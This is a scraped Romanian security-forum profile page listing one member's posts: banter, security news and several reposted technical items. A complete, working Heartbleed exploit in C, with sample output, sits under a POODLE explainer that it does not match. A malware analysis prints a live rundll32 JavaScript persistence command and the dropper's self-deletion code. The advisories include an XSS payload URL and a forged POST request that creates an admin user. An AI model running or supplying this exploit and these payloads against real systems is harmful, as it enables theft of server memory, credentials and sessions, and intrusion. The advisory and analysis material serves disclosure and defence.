Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Everything posted by Aerosol

  1. @Gecko cred ca vrea sa spuna ca-i apare pe google "error 413 persistent!" X3:// Multumesc ca l-ai facut public....
  2. Aerosol

    Fun stuff

    Times New Roman - Radu Beligan a fost la prim?rie s?-?i reînnoiasc? certificatul de na?tere, expirat ))))) Veste socanta!!!
  3. Aerosol

    Fun stuff

    Ca tot e vorba de games of thrones...
  4. Aerosol

    Fun stuff

    "Isus e cel mai tareee, el niciodata nu va moare" )
  5. ome non typical malware which doesn't have any attention from "security experts" and other internet clowns. Maybe because of this it is not well detected on VT. The key features of it, making it non typical: 1) This malware lives in registry value. 2) Non typical dropper self-deletion method, nothing zero day though. 3) Malware startup location protection in a backdoor Sirefef way. 4) It downloads, installs and uses Windows KB968930 (MS PowerShell). More details below 1) This malware stored under key HKCU\Software\Microsoft\Windows\CurrentVersion\Run and it autostart location is invisible to regedit, why explained in part 3. That's what really here. "Unnamed" value is a forged registry value that holds command to execute malware script stored in "Default" value. Exactly this value makes regedit crazy. Autostart malware script below. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>") It purpose - read, encode and execute script stored in the "Default" value. The decoded malware now set as process environment variable named "a" and contains additional code to execute stored again as script code, lets call it ScriptA. It is named ScriptA.txt in attached archive. Decoded script attached as ScriptB.txt. As you can see they multiple times use base64 encoding for layered payload. Inside ScriptB you can find another base64 encoded which is attached as PayloadA.txt. This is base64 encoded dll which is actual malware designed to be running inside zombified copy of dllhost.exe (this malware aware about WOW64 and will select appropriate version of this executable - Wow64DisableWow64FsRedirection %windir%\syswow64\dllhost.exe or %windir%\system32\dllhost.exe). Final payload dll (attached as payload.dll) packed with MPRESS v2.19. Unpacking MPRESS is similar to manual unpack of UPX. This dll is simple and is capable of downloading and executing arbitrary files on infected machine (WinExec). Also because it is used in startup process this dll is also responsible for zombifying dllhost.exe process and self-injection through NtQueueApcThread. 2) It uses NTFS ADS for dropper self-deletion and more trivial MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT if first method failed. After self-deletion malware persist on infected computer only in the zombified processes VA and in the registry. First dropper attaches itself as stream to dropper. e.g. C:\malware.exe -> C:\malware.exe:0 where 0 is a NTFS data stream copy of malware.exe. Next it spawns process from ADS and calls DeleteFile. Yeah I too can F5 in HexRays. signed int __stdcall sub_401696(LPCSTR lpExistingFileName) { char *NewFileName; struct _STARTUPINFOA StartupInfo; struct _PROCESS_INFORMATION ProcessInformation; snprintf(&NewFileName, 0xFFFu, "%s:0", lpExistingFileName); if ( CopyFileA(lpExistingFileName, &NewFileName, 0) ) { StartupInfo.cb = 68; memset(&StartupInfo.lpReserved, 0, 0x40u); if ( CreateProcessA(&NewFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation) ) { CloseHandle(ProcessInformation.hThread); CloseHandle(ProcessInformation.hProcess); return 1; } DeleteFileA(&NewFileName); } else { if ( MoveFileExA(&NewFileName, 0, MOVEFILE_DELAY_UNTIL_REBOOT) ) return 1; } return 0; } 3) Embedded nulls used for protecting startup key HKCU\Software\Microsoft\Windows\CurrentVersion\Run key from removal and for hiding actual run value (regedit cannot handle incorrect value name and cancels listing items). Malware payload dll inside dllhost zombie process additionally works as a watchdog and will recover malware startup registry values if they are removed. Detection and Removal instructions: This malware can be easily revealed because of invasive self-protection it uses. Autoruns and ProcessExplorer from sysinternals all you need to detect presense of this malware. Locate and terminate dllhost.exe running without parents (it is launched by powershell that after exists). regdelnull hkcu -s to remove forged Run subkey. Regedit - delete whole HKCU\Software\Microsoft\Windows\CurrentVersion\Run key. Sample courtesy of R136a1 https://twitter.com/MalwareChannel/status/454939686885412864 Also thanks to B-boy/StyLe/ who bring attention to this malware. Download pass: infected Source
  6. Am facut si Video P.O.C. [m-au pus sa le fac 2 nu stiu de ce...] ( o sa il postez dupa ce se rezolva, e raportat de pe 29 mai ) abia acum cateva zile mi-au raspuns. La gasirea XSS-ului a participat si @Kronzy La scurt timp dupa ce l-am raportat vorbind cu un amic l-a descoperit si el ( a promis ca nu-l va publica ) pana nu e totul rezolvat. P.S:// Am sa revin cu video dupa ce se rezolva. T.C sa ramanana curat!
  7. Ping Pong si Biliard ( cand am timp tenis de camp )
  8. In the Navy, you can sail the seven seas, in the Navy, you can p0wn your foes with ease In the Navy, the Village People sang, you can sail the seven seas and live a life of ease. And now you can also work with third parties to identify and exploit 0-day flaws in common commercial software. That Naval job is revealed in a fascinating solicitation for a provider capable of reporting new flaws and developing weaponised software to exploit them. “This is a requirement to have access to vulnerability intelligence, exploit reports and operational exploit binaries affecting widely used and relied upon commercial software,” the solicitation reads. The document goes on to say it wants “... a proposed list of available vulnerabilities, 0-day or N-day (no older than 6 months old).” Quarterly updates are sought and should “include intelligence and exploits affecting widely used software.” And here's the nasty part: “The government will select from the supplied list and direct development of exploit binaries.” Whoever gets the gig will also be required to “... develop exploits for future released Common Vulnerabilities and Exposures.” The Navy's definition of “ widely used software” includes “Microsoft, Adobe, JAVA, EMC, Novell, IBM, Android, Apple, CISCO IOS, Linksys WRT, and Linux, and all others.” “They want you | They want you | They want you as a new recruit” if you're a small business willing to do the job for a year, with the prospect of a further three years' work if you're good at it. That the US Navy is interested in exploiting 0-days should come as no surprise to anyone, so while this solicitation looks a bit sinister it is surely business as usual, and good business for whoever gets the gig. Source
  9. Foxing the holes in the code Mozilla has more than doubled the cash rewards under its dusty bug bounty to beyond $10,000. The browser baron has increased the reward for high-severity bugs such as those leading to remote code execution without requiring other vulnerabilities. Engineer Raymond Forbes says the bounty had not been updated in five years and had fallen out of step. "The amount awarded was increased to $3000 five years ago and it is definitely time for this to be increased again," Forbes says. "We have dramatically increased the amount of money that a vulnerability is worth [and] we are moving to a variable payout based on the quality of the bug report, the severity of the bug, and how clearly the vulnerability can be exploited. "Finally, we looked into how we decide what vulnerability is worth a bounty award." Mozilla previously awarded $3000 for critical vulnerabilities that could seriously endanger users. It paid small amounts for only some moderate vulnerabilities that will under the revamp now attract up to $2000. The Firefox forger also launched its security bug hall of fame which is a common and important component of bug bounty programs, and will open a version for web and services. Bug bounties are enjoying a boom of late with many large organisations opening in-house and outsourced programs to attract security vulnerability researchers. The schemes promise to increase the security profile of organisations while providing hackers with an opportunity to practice their skills and earn cash or prizes without the threat of legal ramifications. Programs must be properly set up prior to launch including clear security policies and contact details posted to an organisation's web site, and strong communication between IT staff and bug hunters. Hackers will often drop unpatched vulnerabilities to the public domain if an organisation fails to respond or refuses to fix the bugs. Source
  10. Advisory: Adobe Connect Reflected XSS Author: Stas Volfus (Bugsec Information Security LTD) Vendor URL: http://www.adobe.com/ Status: Vendor Notified ========================== Vulnerability Description ========================== Adobe Connect (Central) version: 9.3 is vulnerable to Reflected XSS (Cross Site Scripting). The attack allows execution of arbitrary JavaScript in the context of the user’s browser. CVE id: CVE-2015-0343 assigned for this issue. ========================== PoC ========================== The following URL demonstrates the vulnerability: https://vulnerablewebsite.com/admin/home/homepage/search?account-id=1&filter-rows=1&filter-start=0&now=yes&query=<a href="javascript:alert('XSS')">XSS Link</a> ========================== Disclosure Timeline ========================== 04-NOV-2014 - Vendor notified 01-DEC-2014 - CVE assigned 27-MAR-2015 - Resolved by vendor, fix deployed on Adobe Connect 9.4. ========================== References ========================== http://www.adobe.com/il_en/products/adobeconnect.html https://helpx.adobe.com/adobe-connect/release-note/connect-94-release-notes.html Source
  11. Il recomand pe baiat, lucreaza excelent si este foarte serios.
  12. Apple iOS 9 users will be required to use six-digit passwords instead of four-digit codes when logging in to a device. The tech giant also announced it would be using two-factor authentication for users signing into Apple services from a new device or browser. The updates will apply to all Apple devices enabled with TouchID. With the new authentication process, users will receive a verification code sent to their device after submitting their password. They will then have to enter the code in the new device or browser in order to gain access to apps and services. Apple unveiled the new features on Monday at its 2015 World Wide Developers Conference in San Francisco. The company also introduced new features including: Apple Music, Apple Car Play, Wallet and a public transit option in Apple Maps, available later this year. Source
  13. Ce rahat... Ok nu ai voie sa stergi istoricul dar daca eu folosesc "Fila noua Incognito" si nu se salveaza nimic, ce trebuie sa fac?
  14. POODLE Revine in forta. Introduction SSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical purposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346], and TLS 1.2 [RFC5246], many TLS implementations remain backwards*compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. The protocol handshake provides for authenticated version negotiation, so normally the latest protocol version common to the client and the server will be used. The POODLE Attack To work with legacy servers, many TLS clients implement a downgrade dance: in a first handshake attempt, offer the highest protocol version supported by the client? if this handshake fails, retry (possibly repeatedly) with earlier protocol versions. Unlike proper protocol version negotiation (if the client offers TLS 1.2, the server may respond with, say, TLS 1.0), this downgrade can also be triggered by network glitches, or by active attackers. So if an attacker that controls the network between the client and the server interferes with any attempted handshake offering TLS 1.0 or later, such clients will readily confine themselves to SSL 3.0. Recommendations The attack described above requires an SSL 3.0 connection to be established, so disabling the SSL 3.0 protocol in the client or in the server (or both) will completely avoid it. If either side supports only SSL 3.0, then all hope is gone, and a serious update required to avoid insecure encryption. If SSL 3.0 is neither disabled nor the only possible protocol version, then the attack is possible if the client uses a downgrade dance for interoperability. Impact The POODLE attack can be used against any system or application that supports SSL 3.0 with CBC mode ciphers. This affects most current browsers and websites, but also includes any software that either references a vulnerable SSL/TLS library (e.g. OpenSSL) or implements the SSL/TLS protocol suite itself. By exploiting this vulnerability in a likely web-based scenario, an attacker can gain access to sensitive data passed within the encrypted web session, such as passwords, cookies and other authentication tokens that can then be used to gain more complete access to a website (impersonating that user, accessing database content, etc.). Solution There is currently no fix for the vulnerability SSL 3.0 itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system/application configurations is the most viable solution currently available. Some of the same researchers that discovered the vulnerability also developed a fix for one of the rerequisite conditions; TLS_FALLBACK_SCSV is a protocol extension that prevents MITM attackers from being able to force a protocol downgrade. OpenSSL has added support for TLS_FALLBACK_SCSV to their latest versions and recommend the following upgrades: - OpenSSL 1.0.1 users should upgrade to 1.0.1j. - OpenSSL 1.0.0 users should upgrade to 1.0.0o. - OpenSSL 0.9.8 users should upgrade to 0.9.8zc. Both clients and servers need to support TLS_FALLBACK_SCSV to prevent downgrade attacks. Other SSL 3.0 implementations are most likely also affected by POODLE. Contact your vendor for details. Additional vendor information may be available in the National Vulnerability Database (NVD) entry for CVE-2014-3566 or in CERT Vulnerability Note VU#577193.[7] Vulnerable TLS implementations need to be updated. CVE ID assignments and vendor information are also available in the NVD.[8] Exploit /* * Heartbleed OpenSSL information leak exploit * ========================================================= * This exploit uses OpenSSL to create an encrypted connection * and trigger the heartbleed leak. The leaked information is * returned within encrypted SSL packets and is then decrypted * and wrote to a file to annoy IDS/forensics. The exploit can * set heartbeat payload length arbitrarily or use two preset * values for NULL and MAX length. The vulnerability occurs due * to bounds checking not being performed on a heap value which * is user supplied and returned to the user as part of DTLS/TLS * heartbeat SSL extension. All versions of OpenSSL 1.0.1 to * 1.0.1f are known affected. You must run this against a target * which is linked to a vulnerable OpenSSL library using DTLS/TLS. * This exploit leaks upto 65535 bytes of remote heap each request * and can be run in a loop until the connected peer ends connection. * The data leaked contains 16 bytes of random padding at the end. * The exploit can be used against a connecting client or server, * it can also send pre_cmd's to plain-text services to establish * an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients * will often forcefully close the connection during large leak * requests so try to lower your payload request size. * * Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g * * E.g. * $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed * $ ./heartbleed -s -p 443 -f out -t 1 * [ heartbleed OpenSSL information leak exploit * [ ============================================================= * [ connecting to 443/tcp * [ connected to 443/tcp * [ <3 <3 <3 heart bleed <3 <3 <3 * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ heartbleed leaked length=65535 * [ final record type=24, length=16384 * [ wrote 16381 bytes of heap to file 'out' * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ final record type=24, length=16384 * [ wrote 16384 bytes of heap to file 'out' * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ final record type=24, length=16384 * [ wrote 16384 bytes of heap to file 'out' * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ final record type=24, length=16384 * [ wrote 16384 bytes of heap to file 'out' * [ heartbeat returned type=24 length=42 * [ decrypting SSL packet * [ final record type=24, length=18 * [ wrote 18 bytes of heap to file 'out' * [ done. * $ ls -al out * -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out * $ hexdump -C out * - snip - snip * * Use following example command to generate certificates for clients. * * $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \ * -keyout server.key -out server.crt * * Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \ * -lssl -Wl,-Bdynamic -lssl3 -lcrypto" * * todo: add udp/dtls support. * * - Beyondtrust * http://www.beyondtrust.com * */ #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <getopt.h> #include <signal.h> #include <netdb.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <inttypes.h> #include <openssl/bio.h> #include <openssl/ssl.h> #include <openssl/err.h> #include <openssl/evp.h> #include <openssl/tls1.h> #include <openssl/rand.h> #include <openssl/buffer.h> #define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \ (((unsigned int)(c[1])) )),c+=2) #define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \ c[1]=(unsigned char)(((s) )&0xff)),c+=2) int first = 0; int leakbytes = 0; int repeat = 1; int badpackets = 0; typedef struct { int socket; SSL *sslHandle; SSL_CTX *sslContext; } connection; typedef struct { unsigned char type; short version; unsigned int length; unsigned char hbtype; unsigned int payload_length; void* payload; } heartbeat; void ssl_init(); void usage(); int tcp_connect(char*,int); int tcp_bind(char*, int); connection* tls_connect(int); connection* tls_bind(int); int pre_cmd(int,int,int); void* heartbleed(connection* ,unsigned int); void* sneakyleaky(connection* ,char*, int); int tcp_connect(char* server,int port){ int sd,ret; struct hostent *host; struct sockaddr_in sa; host = gethostbyname(server); sd = socket(AF_INET, SOCK_STREAM, 0); if(sd==-1){ printf("[!] cannot create socket\n"); exit(0); } sa.sin_family = AF_INET; sa.sin_port = htons(port); sa.sin_addr = *((struct in_addr *) host->h_addr); bzero(&(sa.sin_zero),8); printf("[ connecting to %s %d/tcp\n",server,port); ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr)); if(ret==0){ printf("[ connected to %s %d/tcp\n",server,port); } else{ printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port); exit(0); } return sd; } int tcp_bind(char* server, int port){ int sd, ret, val=1; struct sockaddr_in sin; struct hostent *host; host = gethostbyname(server); sd=socket(AF_INET,SOCK_STREAM,0); if(sd==-1){ printf("[!] cannot create socket\n"); exit(0); } memset(&sin,0,sizeof(sin)); sin.sin_addr=*((struct in_addr *) host->h_addr); sin.sin_family=AF_INET; sin.sin_port=htons(port); setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val)); ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin)); if(ret==-1){ printf("[!] cannot bind socket\n"); exit(0); } listen(sd,5); return(sd); } void ssl_init(){ SSL_load_error_strings(); SSL_library_init(); OpenSSL_add_all_digests(); OpenSSL_add_all_algorithms(); OpenSSL_add_all_ciphers(); } connection* tls_connect(int sd){ connection *c; c = malloc(sizeof(connection)); if(c==NULL){ printf("[ error in malloc()\n"); exit(0); } c->socket = sd; c->sslHandle = NULL; c->sslContext = NULL; c->sslContext = SSL_CTX_new(SSLv23_client_method()); SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); if(c->sslContext==NULL) ERR_print_errors_fp(stderr); c->sslHandle = SSL_new(c->sslContext); if(c->sslHandle==NULL) ERR_print_errors_fp(stderr); if(!SSL_set_fd(c->sslHandle,c->socket)) ERR_print_errors_fp(stderr); if(SSL_connect(c->sslHandle)!=1) ERR_print_errors_fp(stderr); if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ printf("[ warning: heartbeat extension is unsupported (try anyway)\n"); } return c; } connection* tls_bind(int sd){ int bytes; connection *c; char* buf; buf = malloc(4096); if(buf==NULL){ printf("[ error in malloc()\n"); exit(0); } memset(buf,0,4096); c = malloc(sizeof(connection)); if(c==NULL){ printf("[ error in malloc()\n"); exit(0); } c->socket = sd; c->sslHandle = NULL; c->sslContext = NULL; c->sslContext = SSL_CTX_new(SSLv23_server_method()); if(c->sslContext==NULL) ERR_print_errors_fp(stderr); SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); SSL_CTX_SRP_CTX_init(c->sslContext); SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM); SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); if(!SSL_CTX_check_private_key(c->sslContext)){ printf("[!] FATAL: private key does not match the certificate public key\n"); exit(0); } c->sslHandle = SSL_new(c->sslContext); if(c->sslHandle==NULL) ERR_print_errors_fp(stderr); if(!SSL_set_fd(c->sslHandle,c->socket)) ERR_print_errors_fp(stderr); int rc = SSL_accept(c->sslHandle); printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle)); bytes = SSL_read(c->sslHandle, buf, 4095); printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf); if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ printf("[ warning: heartbeat extension is unsupported (try anyway)\n"); } return c; } int pre_cmd(int sd,int precmd,int verbose){ /* this function can be used to send commands to a plain-text service or client before heartbleed exploit attempt. e.g. STARTTLS */ int rc, go = 0; char* buffer; char* line1; char* line2; switch(precmd){ case 0: line1 = "EHLO test\n"; line2 = "STARTTLS\n"; break; case 1: line1 = "CAPA\n"; line2 = "STLS\n"; break; case 2: line1 = "a001 CAPB\n"; line2 = "a002 STARTTLS\n"; break; default: go = 1; break; } if(go==0){ buffer = malloc(2049); if(buffer==NULL){ printf("[ error in malloc()\n"); exit(0); } memset(buffer,0,2049); rc = read(sd,buffer,2048); printf("[ banner: %s",buffer); send(sd,line1,strlen(line1),0); memset(buffer,0,2049); rc = read(sd,buffer,2048); if(verbose==1){ printf("%s\n",buffer); } send(sd,line2,strlen(line2),0); memset(buffer,0,2049); rc = read(sd,buffer,2048); if(verbose==1){ printf("%s\n",buffer); } } return sd; } void* heartbleed(connection *c,unsigned int type){ unsigned char *buf, *p; int ret; buf = OPENSSL_malloc(1 + 2); if(buf==NULL){ printf("[ error in malloc()\n"); exit(0); } p = buf; *p++ = TLS1_HB_REQUEST; switch(type){ case 0: s2n(0x0,p); break; case 1: s2n(0xffff,p); break; default: printf("[ setting heartbeat payload_length to %u\n",type); s2n(type,p); break; } printf("[ <3 <3 <3 heart bleed <3 <3 <3\n"); ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3); OPENSSL_free(buf); return c; } void* sneakyleaky(connection *c,char* filename, int verbose){ char *p; int ssl_major,ssl_minor,al; int enc_err,n,i; SSL3_RECORD *rr; SSL_SESSION *sess; SSL* s; unsigned char md[EVP_MAX_MD_SIZE]; short version; unsigned mac_size, orig_len; size_t extra; rr= &(c->sslHandle->s3->rrec); sess=c->sslHandle->session; s = c->sslHandle; if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER) extra=SSL3_RT_MAX_EXTRA; else extra=0; if ((s->rstate != SSL_ST_READ_BODY) || (s->packet_length < SSL3_RT_HEADER_LENGTH)) { n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0); if (n <= 0) goto apple; s->rstate=SSL_ST_READ_BODY; p=s->packet; rr->type= *(p++); ssl_major= *(p++); ssl_minor= *(p++); version=(ssl_major<<8)|ssl_minor; n2s(p,rr->length); if(rr->type==24){ printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length); if(rr->length > 16834){ printf("[ error: got a malformed TLS length.\n"); exit(0); } } else{ printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length); s->packet_length=0; badpackets++; if(badpackets > 3){ printf("[ error: too many bad packets recieved\n"); exit(0); } goto apple; } } if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){ i=rr->length; n=ssl3_read_n(s,i,i,1); if (n <= 0) goto apple; } printf("[ decrypting SSL packet\n"); s->rstate=SSL_ST_READ_HEADER; rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]); rr->data=rr->input; tls1_enc(s,0); if((sess != NULL) && (s->enc_read_ctx != NULL) && (EVP_MD_CTX_md(s->read_hash) != NULL)) { unsigned char *mac = NULL; unsigned char mac_tmp[EVP_MAX_MD_SIZE]; mac_size=EVP_MD_CTX_size(s->read_hash); OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE); orig_len = rr->length+((unsigned int)rr->type>>8); if(orig_len < mac_size || (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE && orig_len < mac_size+1)){ al=SSL_AD_DECODE_ERROR; SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT); } if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){ mac = mac_tmp; ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len); rr->length -= mac_size; } else{ rr->length -= mac_size; mac = &rr->data[rr->length]; } i = tls1_mac(s,md,0); if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0) enc_err = -1; if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size) enc_err = -1; } if(enc_err < 0){ al=SSL_AD_BAD_RECORD_MAC; SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC); goto apple; } if(s->expand != NULL){ if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) { al=SSL_AD_RECORD_OVERFLOW; SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG); goto apple; } if (!ssl3_do_uncompress(s)) { al=SSL_AD_DECOMPRESSION_FAILURE; SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION); goto apple; } } if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) { al=SSL_AD_RECORD_OVERFLOW; SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG); goto apple; } rr->off=0; s->packet_length=0; if(first==0){ uint heartbleed_len = 0; char* fp = s->s3->rrec.data; (long)fp++; memcpy(&heartbleed_len,fp,2); heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8; first = 2; leakbytes = heartbleed_len + 16; printf("[ heartbleed leaked length=%u\n",heartbleed_len); } if(verbose==1){ { unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); } printf("\n"); } leakbytes-=rr->length; if(leakbytes > 0){ repeat = 1; } else{ repeat = 0; } printf("[ final record type=%d, length=%u\n", rr->type, rr->length); int output = s->s3->rrec.length-3; if(output > 0){ int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); if(first==2){ first--; write(fd,s->s3->rrec.data+3,s->s3->rrec.length); /* first three bytes are resp+len */ printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename); } else{ /* heap data & 16 bytes padding */ write(fd,s->s3->rrec.data+3,s->s3->rrec.length); printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename); } close(fd); } else{ printf("[ nothing from the heap to write\n"); } return; apple: printf("[ problem handling SSL record packet - wrong type?\n"); badpackets++; if(badpackets > 3){ printf("[ error: too many bad packets recieved\n"); exit(0); } return; } void usage(){ printf("[\n"); printf("[ --server|-s <ip/dns> - the server to target\n"); printf("[ --port|-p <port> - the port to target\n"); printf("[ --file|-f <filename> - file to write data to\n"); printf("[ --bind|-b <ip> - bind to ip for exploiting clients\n"); printf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\n"); printf("[ 0 = SMTP\n"); printf("[ 1 = POP3\n"); printf("[ 2 = IMAP\n"); printf("[ --loop|-l - loop the exploit attempts\n"); printf("[ --type|-t <n> - select exploit to try\n"); printf("[ 0 = null length\n"); printf("[ 1 = max leak\n"); printf("[ n = heartbeat payload_length\n"); printf("[\n"); printf("[ --verbose|-v - output leak to screen\n"); printf("[ --help|-h - this output\n"); printf("[\n"); exit(0); } int main(int argc, char* argv[]){ int ret, port, userc, index; int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9; int loop = 0; struct hostent *h; connection* c; char *host, *file; int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0; printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n"); printf("[ =============================================================\n"); static struct option options[] = { {"server", 1, 0, 's'}, {"port", 1, 0, 'p'}, {"file", 1, 0, 'f'}, {"type", 1, 0, 't'}, {"bind", 1, 0, 'b'}, {"verbose", 0, 0, 'v'}, {"precmd", 1, 0, 'c'}, {"loop", 0, 0, 'l'}, {"help", 0, 0,'h'} }; while(userc != -1) { userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index); switch(userc) { case -1: break; case 's': if(ihost==0){ ihost = 1; h = gethostbyname(optarg); if(h==NULL){ printf("[!] FATAL: unknown host '%s'\n",optarg); exit(1); } host = malloc(strlen(optarg) + 1); if(host==NULL){ printf("[ error in malloc()\n"); exit(0); } sprintf(host,"%s",optarg); } break; case 'p': if(iport==0){ port = atoi(optarg); iport = 1; } break; case 'f': if(ifile==0){ file = malloc(strlen(optarg) + 1); if(file==NULL){ printf("[ error in malloc()\n"); exit(0); } sprintf(file,"%s",optarg); ifile = 1; } break; case 't': if(itype==0){ type = atoi(optarg); itype = 1; } break; case 'h': usage(); break; case 'b': if(ihost==0){ ihost = 1; host = malloc(strlen(optarg)+1); if(host==NULL){ printf("[ error in malloc()\n"); exit(0); } sprintf(host,"%s",optarg); bind = 1; } break; case 'c': if(iprecmd == 0){ iprecmd = 1; precmd = atoi(optarg); } break; case 'v': verbose = 1; break; case 'l': loop = 1; break; default: break; } } if(ihost==0||iport==0||ifile==0||itype==0||type < 0){ printf("[ try --help\n"); exit(0); } ssl_init(); if(bind==0){ ret = tcp_connect(host, port); pre_cmd(ret, precmd, verbose); c = tls_connect(ret); heartbleed(c,type); while(repeat==1){ sneakyleaky(c,file,verbose); } while(loop==1){ printf("[ entered heartbleed loop\n"); first=0; repeat=1; heartbleed(c,type); while(repeat==1){ sneakyleaky(c,file,verbose); } } printf("[ done.\n"); exit(0); } else{ int sd, pid, i; ret = tcp_bind(host, port); while(1){ sd=accept(ret,0,0); if(sd==-1){ printf("[!] FATAL: problem with accept()\n"); exit(0); } if(pid=fork()){ close(sd); } else{ c = tls_bind(sd); pre_cmd(ret, precmd, verbose); heartbleed(c,type); while(repeat==1){ sneakyleaky(c,file,verbose); } while(loop==1){ printf("[ entered heartbleed loop\n"); first=0; repeat=0; heartbleed(c,type); while(repeat==1){ sneakyleaky(c,file,verbose); } } printf("[ done.\n"); exit(0); } } } } Source
  15. Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. The management web interface has no protection against cross-site request forgery attacks. This allows specially crafted web pages to change the switch configuration and create users, if an administrator accesses the website while being authenticated in the management web interface. Details ======= Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855, 6900, 10K, 6860 Affected Versions: All Releases: AOS 6.4.5.R02 AOS 6.4.6.R01 AOS 6.6.4.R01 AOS 6.6.5.R02 AOS 7.3.2.R01 AOS 7.3.3.R01 AOS 7.3.4.R01 AOS 8.1.1.R01 Fixed Versions: - Vulnerability Type: Cross-site request forgery Security Risk: medium Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004 Advisory Status: published CVE: CVE-2015-2805 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805 Introduction ============ "The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage) More Details ============ The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. The web interface allows creating new user accounts, in this case an HTTP request like the following is sent to the switch: POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1 Host: [...] Cookie: session=sess_15739 Content-Type: application/x-www-form-urlencoded Content-Length: 214 EmWeb_ns:mip:2.T1:I1=attacker &EmWeb_ns:mip:244.T1:O1=secret 